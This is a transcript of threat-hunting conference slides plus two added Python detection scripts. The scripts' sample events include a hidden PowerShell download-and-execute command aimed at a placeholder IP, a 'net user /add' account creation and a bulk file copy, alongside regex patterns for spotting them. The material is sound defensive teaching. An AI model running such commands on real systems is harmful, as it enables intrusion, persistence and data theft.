Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
Uploaded by: north-texas-chapter-of-the-issa
Transcript of Luncheon 2016-07-16 - Topic 2 - Advanced Threat Hunting by Justin Falck
©2014 Bit9. All Rights Reserved
Advanced Threat Hunting: Identify and Track Zero-Day Attacks Infiltrating Your Organization
Justin Falck, Technical Product Manager – Carbon Black
Bit9 + Carbon Black
July 16th, 2015
Agenda
Background
Threat Landscape
Advanced Threats
• What are they?
• Zero-Days
• Why Advanced Threats might not be what you think they are
• Living off the Land (“Outsider-Insider”)
Hunting
• What do you hunt?
• How do you hunt?
• Relationships Matter!
Wrap-Up & Takeaways
Quick Background Check
www.linkedin.com/in/justinfalck [email protected]
2007 – 2013: Central Intelligence Agency
2013 – 2015: Goldman Sachs Threat Management Center – Irving, TX
2015 – Present: Bit9 + Carbon Black, Technical Product Manager – CB
The Evolving Threat Landscape
Criminal Enterprises
• Broad-based and targeted attacks
• Financially motivated
• Getting more sophisticated
Hacktivists
• Targeted and destructive attacks
• Unpredictable motivations
• Generally less sophisticated
Nation-States
• Targeted and multi-stage attacks
• Motivated by information and IP
• Highly sophisticated, limitless resources
Cyber Terrorism
• Targeted and highly visible attacks
• Financial, destructive, intimidating
• Varied sophistication
Proof of Effectiveness
Endless Stream of Data Breaches
Source: Information is Beautiful, www.informationisbeautiful.net, January 2015
DON’T OVERCOMPLICATE THE THREAT
THREAT MODEL: 1: OPPORTUNISTIC 2: NOT
Opportunistic threats sell our computers. Goal: breadth of access.
“Advanced” threats sell our data. Goal: precision of access.
Traditional Defenses Were Designed for Opportunistic Attacks
[Chart: two panels of Hosts Compromised vs. Time, each with a DETECTION THRESHOLD line]
Opportunistic: goal for attacker is to compromise as many endpoints as possible; signature available.
Advanced: goal for attacker is to compromise as few endpoints as possible; signature available (if ever).
“Zero-Days”
“Zero-Day” is a term typically used to refer to two different scenarios:
• Zero-Day Vulnerability: vulnerability is unknown or fix/patch is not yet available
– “Non-Pub”: exploit an unknown vulnerability
• Zero-Day Malware: malware that is unknown; signatures are not available
So how “advanced” are the techniques and payloads being used?
“The (Target) malware utilized is ABSOLUTELY UNSOPHISTICATED and UNINTERESTING” – McAfee
Business Week, March 13, 2014
But once they’re in…
However they get in, we need to find them! Faster detection means:
• Shorter dwell time
• Smaller scope for your incident response
• Less damage to your business
What do they do once they’re in?
They often “Live off the Land” (and blend in)
Living off the Land
Living Off the Land: the attacker uses built-in tools so there are very few new executables. The attacker typically needs to do the following:
• Execute code:
– Crack/Dump/Guess/Obtain Valid Credentials
» See this with Backoff POS Malware
• Copy Data:
– Utilize tools like robocopy, xcopy, cmd.exe to gather data
– Utilize “known good” tools for compression or use scripts
• Exfil Data:
– ftp.exe, net.exe, Visual Basic script to control IE for POSTing data
• Manipulate:
– Download something not malicious but that will trip up detection
– When Admin logs in, credentials, keystrokes, etc., are captured and used
• Persist:
– Compromise or add more user and system accounts
– Login to backup servers, staging servers, less noticeable parts of your enterprise
– Create scheduled jobs that will run and re-add accounts, communicate out, etc.
Living off the Land (cont’d)
More Things to Consider:
• PowerShell is TOO Powerful
– Execute from remote URL
– Basically anything you would ever want to write code for, you can do with PowerShell, so as an adversary, I can really do some damage (PowerSploit, etc.)
• Use Internal C2 Sites:
– Use blog comments and/or a wiki to give your stuff new commands so there are no outside communications
• Use Well-Known Social Networking and File-sharing Sites:
– Twitter (bots)
– Dropbox
– Google Drive
– Facebook
– < Insert Social Site Here >
• Find hardcoded credentials, re-use of the same password across an enterprise, Single-Sign-On design flaws, etc.
In Other Words…
THEY ARE NOW INSIDERS! BETTER DEFENSE AGAINST THIS… LEADS TO BETTER DEFENSE AGAINST TRUE INSIDERS!
So, back to Hunting…
Is Your Environment Like This?
Or This?
What do you Hunt?
Do you know what you’re looking for? Do they have to be advanced?
• Are you running vulnerable software? Is it likely to be compromised?
• Have you hardened your systems? Have you reduced surface area?
• Do you have shared passwords, plain-text credentials, etc.?
• If you have too much entropy or very few standards, hunting will be DIFFICULT
• Then again, it is rarely “easy”
What do the bad guys need to do?
• Execute
• Communicate
• Grab Data
• Steal/Add Credentials
• Persist
Which comes first… Detection or Collection?
By prioritizing collection over detection you can:
(1) HUNT MORE EFFECTIVELY!!!
(2) Rapidly find root cause
(3) Quickly & confidently reconstruct timelines
(4) Accelerate Discovery (determine scope)
(5) Benefit from hindsight (evolve)
Some Ideas…
§ Are abnormal user accounts being used?
§ Do Windows processes (lsass, svchost, csrss) have strange parents?
§ Are IE, Acrobat, Word, Notepad, etc., spawning child processes?
§ Are Office applications making outbound connections?
§ Is Java spawning command shells?
§ Is cmd.exe running as SYSTEM?
§ Are user accounts being added locally?
§ Are thousands of files being modified by a single process?
§ Is ftp or robocopy being used?
§ Are processes executing that don’t have a .exe or .scr extension?
Back to the Basics…
§ Are you recording every command line used by net.exe and looking for abnormalities?
§ Are you watching when PowerShell.exe is used?
§ Are you mapping user account activity to hosts to look for abnormal logins?
§ Are you …. <INSERT LOTS OF STUFF “TO DO” HERE>
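The questions in the two lists above become cheap to ask once process-creation events (parent image, image, user, command line) are actually being collected. What follows is an added example, not code from this deck or from Bit9 + Carbon Black: a small Python hunt that runs several of those checks, plus the living-off-the-land tools named earlier (net.exe adding accounts, ftp/robocopy, PowerShell pulling code from a remote URL), over a constructed batch of Sysmon-style events. The event field names, the expected-parent table, the user-app list, and every sample event are assumptions made for this example.

```python
"""Hunting heuristics from the slides over constructed process-creation events.

Added example (not from the original deck). Event fields loosely mimic a
Sysmon Event ID 1 / EDR process-start record; every event below is constructed.
"""
import ntpath
import re
from typing import Dict, Iterable, List

# User-facing apps that should almost never spawn children (assumed list).
USER_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
             "iexplore.exe", "acrord32.exe", "notepad.exe"}
# Core Windows processes and the parents they are expected to have (assumed).
EXPECTED_PARENT = {"lsass.exe": {"wininit.exe"},
                   "csrss.exe": {"smss.exe"},
                   "svchost.exe": {"services.exe"}}
SHELLS = {"cmd.exe", "powershell.exe"}
COPY_TOOLS = {"ftp.exe", "robocopy.exe"}
# net.exe / net1.exe adding a user or a group member.
NET_ADD_RE = re.compile(r"\bnet1?(\.exe)?\s+(user|localgroup|group)\b.*\s/add\b", re.I)
# PowerShell pulling or evaluating content from a remote URL.
PS_REMOTE_RE = re.compile(r"(DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|https?://)", re.I)


def hunt(events: Iterable[Dict]) -> List[Dict]:
    """Return one finding per heuristic that fires on each event."""
    findings = []
    for e in events:
        image = ntpath.basename(e["image"]).lower()
        parent = ntpath.basename(e["parent_image"]).lower()
        cmd = e.get("command_line", "")
        user = e.get("user", "")
        hits = []
        if parent in USER_APPS:
            hits.append(f"{parent} spawned a child process")
        if image in EXPECTED_PARENT and parent not in EXPECTED_PARENT[image]:
            hits.append(f"{image} has unexpected parent {parent}")
        if parent in ("java.exe", "javaw.exe") and image in SHELLS:
            hits.append("java spawned a command shell")
        if image == "cmd.exe" and user.upper().endswith("SYSTEM"):
            hits.append("cmd.exe running as SYSTEM")
        if not image.endswith((".exe", ".scr")):
            hits.append("process image without .exe/.scr extension")
        if image in COPY_TOOLS:
            hits.append(f"{image} used (bulk copy / exfil tool)")
        if image in ("net.exe", "net1.exe") and NET_ADD_RE.search(cmd):
            hits.append("net.exe adding an account or group member")
        if image == "powershell.exe" and PS_REMOTE_RE.search(cmd):
            hits.append("powershell fetching or evaluating remote content")
        for reason in hits:
            findings.append({"host": e["host"], "pid": e["pid"],
                             "image": image, "reason": reason})
    return findings


def reasons_for(findings: List[Dict], host: str, pid: int) -> List[str]:
    """Convenience: the reasons that fired for one process."""
    return [f["reason"] for f in findings if f["host"] == host and f["pid"] == pid]


# Constructed sample batch: two benign events first, the rest each trip a check.
SAMPLE_EVENTS = [
    {"host": "WS01", "pid": 100, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "user": r"NT AUTHORITY\SYSTEM", "command_line": "svchost.exe -k netsvcs"},
    {"host": "WS01", "pid": 101, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe", "user": r"CORP\alice",
     "command_line": "WINWORD.EXE invoice.docm"},
    {"host": "WS01", "pid": 102, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "user": r"CORP\alice", "command_line": "cmd.exe /c powershell -w hidden"},
    {"host": "WS01", "pid": 103, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "user": r"CORP\alice",
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""},
    {"host": "WS02", "pid": 200, "image": r"C:\Windows\System32\lsass.exe",
     "parent_image": r"C:\Users\Public\update.exe", "user": r"NT AUTHORITY\SYSTEM",
     "command_line": "lsass.exe"},
    {"host": "WS02", "pid": 201, "image": r"C:\ProgramData\svc.dat",
     "parent_image": r"C:\Windows\System32\cmd.exe", "user": r"NT AUTHORITY\SYSTEM",
     "command_line": "svc.dat -s"},
    {"host": "WS02", "pid": 202, "image": r"C:\Windows\System32\net.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "user": r"NT AUTHORITY\SYSTEM",
     "command_line": "net user backup_svc Summer2015! /add"},
    {"host": "WS02", "pid": 203, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Java\jre8\bin\java.exe",
     "user": r"NT AUTHORITY\SYSTEM", "command_line": "cmd.exe /c whoami"},
    {"host": "WS03", "pid": 300, "image": r"C:\Windows\System32\Robocopy.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "user": r"CORP\bob",
     "command_line": "robocopy \\\\fs01\\finance C:\\Users\\bob\\tmp /E"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']} pid={f['pid']} {f['image']}: {f['reason']}")
```

Each check is deliberately a plain conditional on fields the endpoint sensor already records; the value is in having the events at all, which is the deck's point about collection before detection. The two benign events (a normal svchost and Word opened from Explorer) produce nothing, while Word spawning cmd.exe, a java.exe child shell running as SYSTEM, and an lsass.exe with a parent other than wininit.exe each surface on their own.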
“Response is the closest thing we have in IT to dogfighting” – Bruce Schneier, Black Hat 2014 Keynote
“Time is the dominant parameter. The pilot who goes through the OODA cycle in the shortest time prevails because his opponent is caught responding to situations that have already changed.” – Col. John Boyd, 1966
OODA: Observe, Orient, Decide, Act
Actionable Endpoint Visibility (from the Traditional IR view to the Modern IR view)
• Events: most organizations only have a static view of their business and the data they manage to collect.
• Events + Intelligence: with no insight into known bad, how can they pick the needles out of their data collection haystack?
• Events + Intelligence + Prevalence: without understanding prevalence, how can they prioritize detection events to accelerate threat discovery?
• Events + Intelligence + Prevalence + Relationships: without maintaining the recorded relationships, how do they quickly scope any impacted endpoints and lateral movement?
What’s more actionable?
• “svchost.exe ran”
• “svchost.exe was spawned by an unsigned binary under an abnormal user account and made a network connection”
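The jump from “svchost.exe ran” to the second sentence is exactly prevalence plus relationships applied to the same event. The following is an added example, not code from the deck or from Carbon Black, that builds that enriched sentence out of a constructed batch of process-start and network-connection records from four hosts: it counts how many hosts each binary hash has been seen on (prevalence), walks parent/child links to describe one svchost.exe instance, and then uses the same links to scope every process descended from a rare unsigned binary across the fleet. The record fields, the hash values, the “rare” threshold, the user names and all of the sample data are assumptions.

```python
"""Prevalence and relationship scoping over constructed endpoint records.

Added example (not from the original deck). Process records carry a hash,
a code-signing flag and a parent pid; network records reference a pid.
"""
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

# Assumed: a hash seen on this many hosts or fewer is "rare" for this fleet.
RARE_HOSTS = 2
# Images that are expected to run as SYSTEM (assumed subset).
SYSTEM_IMAGES = {"svchost.exe", "lsass.exe", "services.exe", "csrss.exe"}

Proc = Dict
Key = Tuple[str, int]  # (host, pid)


def host_prevalence(procs: List[Proc]) -> Dict[str, int]:
    """Number of distinct hosts on which each sha256 was observed."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for p in procs:
        seen[p["sha256"]].add(p["host"])
    return {h: len(hosts) for h, hosts in seen.items()}


def lookup(procs: List[Proc], host: str, pid: int) -> Optional[Proc]:
    return next((p for p in procs if p["host"] == host and p["pid"] == pid), None)


def describe(procs: List[Proc], net: List[Dict], host: str, pid: int) -> str:
    """Turn 'svchost.exe ran' into the enriched sentence from the slide."""
    p = lookup(procs, host, pid)
    if p is None:
        return f"no record for {host}:{pid}"
    total_hosts = len({q["host"] for q in procs})
    prev = host_prevalence(procs)
    parent = lookup(procs, host, p["ppid"])
    flags = []
    if parent is not None:
        desc = parent["image"]
        if not parent["signed"]:
            desc = "unsigned " + desc
        if prev[parent["sha256"]] <= RARE_HOSTS:
            desc += f" (hash seen on only {prev[parent['sha256']]} of {total_hosts} hosts)"
        if desc != parent["image"]:
            flags.append("was spawned by " + desc)
    if p["image"] in SYSTEM_IMAGES and not p["user"].upper().endswith("SYSTEM"):
        flags.append(f"under abnormal user account {p['user']}")
    dsts = [n["dst"] for n in net if n["host"] == host and n["pid"] == pid]
    if dsts:
        flags.append("made a network connection to " + ", ".join(dsts))
    return p["image"] + (" " + ", ".join(flags) if flags else " ran")


def descendants(procs: List[Proc], host: str, pid: int) -> Set[Key]:
    """All processes on `host` reachable from pid via parent -> child links."""
    children: Dict[int, List[int]] = defaultdict(list)
    for p in procs:
        if p["host"] == host:
            children[p["ppid"]].append(p["pid"])
    out: Set[Key] = set()
    stack = [pid]
    while stack:
        cur = stack.pop()
        for c in children[cur]:
            if (host, c) not in out:
                out.add((host, c))
                stack.append(c)
    return out


def scope_by_hash(procs: List[Proc], sha256: str) -> Set[Key]:
    """Every process that ran the binary, plus everything it spawned, fleet-wide."""
    keys: Set[Key] = set()
    for p in procs:
        if p["sha256"] == sha256:
            keys.add((p["host"], p["pid"]))
            keys |= descendants(procs, p["host"], p["pid"])
    return keys


def _proc(host, pid, ppid, image, sha256, signed, user) -> Proc:
    return {"host": host, "pid": pid, "ppid": ppid, "image": image,
            "sha256": sha256, "signed": signed, "user": user}


SYS = r"NT AUTHORITY\SYSTEM"
# Constructed fleet of four hosts; "ccc" is an unsigned dropper present on two of them.
PROCS = [
    _proc("WS01", 1, 0, "services.exe", "aaa", True, SYS),
    _proc("WS01", 11, 1, "svchost.exe", "bbb", True, SYS),
    _proc("WS01", 12, 2, "explorer.exe", "ddd", True, r"CORP\mlee"),
    _proc("WS02", 1, 0, "services.exe", "aaa", True, SYS),
    _proc("WS02", 21, 1, "svchost.exe", "bbb", True, SYS),
    _proc("WS02", 30, 2, "explorer.exe", "ddd", True, r"CORP\jdoe"),
    _proc("WS02", 32, 30, "update.exe", "ccc", False, r"CORP\jdoe"),
    _proc("WS02", 33, 32, "svchost.exe", "bbb", True, r"CORP\jdoe"),
    _proc("WS03", 1, 0, "services.exe", "aaa", True, SYS),
    _proc("WS03", 41, 1, "svchost.exe", "bbb", True, SYS),
    _proc("WS03", 40, 2, "explorer.exe", "ddd", True, r"CORP\asmith"),
    _proc("WS03", 42, 40, "update.exe", "ccc", False, r"CORP\asmith"),
    _proc("WS03", 43, 42, "svchost.exe", "bbb", True, r"CORP\asmith"),
    _proc("WS04", 1, 0, "services.exe", "aaa", True, SYS),
    _proc("WS04", 51, 1, "svchost.exe", "bbb", True, SYS),
    _proc("WS04", 52, 2, "explorer.exe", "ddd", True, r"CORP\pkim"),
]
NET = [{"host": "WS02", "pid": 33, "dst": "203.0.113.5:443"},
       {"host": "WS03", "pid": 43, "dst": "203.0.113.5:443"}]

if __name__ == "__main__":
    print(describe(PROCS, NET, "WS01", 11))   # the benign case: "svchost.exe ran"
    print(describe(PROCS, NET, "WS02", 33))   # the enriched sentence
    print(sorted(scope_by_hash(PROCS, "ccc")))
```

Note that the suspicious svchost.exe carries the same hash as every legitimate one, so prevalence of the child alone says nothing; it is the parent's hash and signing state, reached through the recorded relationship, that makes the event stand out, and the same relationship links are what let scope_by_hash pull in the second host without a separate search.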
The very nature of threat hunting requires the human element.
In IT, we hire staff to support technology.
In security operations, we buy technology to support staff.
Invest in tools that enable humans to make quick decisions.
Hunting Tips
1. Collect the RIGHT Data
Netflow data and firewall logs can help, but if you aren’t seeing what is executing and what is changing on your systems, you will not have as much hunting success. You need to hunt where the adversaries live!
2. Incorporate Reputation and Classification Information
When you’re hunting, you should not have to spend time manually checking the reputation of a binary or website, as that greatly slows down your ability to continue the hunt. Being able to quickly say things are known good or known bad is key, as is the ability to say whether something is part of a particular campaign or attack.
3. Analyze RELATIONSHIPS
Relationships are key to being able to detect abnormal behavior. Sure, the adversary lives off the land, but they’re still going to do unusual things with the existing tools available to them.
4. Automate as much as possible!
When you know what is normal, you should be able to be alerted when activity occurs outside of what is normal. And you should be able to automate this. You should also automate reputation and classification information retrieval, and automate discovery.
Take-Aways
• Think about how you might hunt advanced threats
• Can internal tools be used against you?
• Do you have proper context?
• Can you tell the FBI whether or not you’ve seen the IOCs they just sent you?
• Compare current behavior vs. older methods vs. “next-gen”
• Enable your humans to do some hunting
• Are you focused on root cause?
Thank You! [email protected] www.linkedin.com/in/justinfalck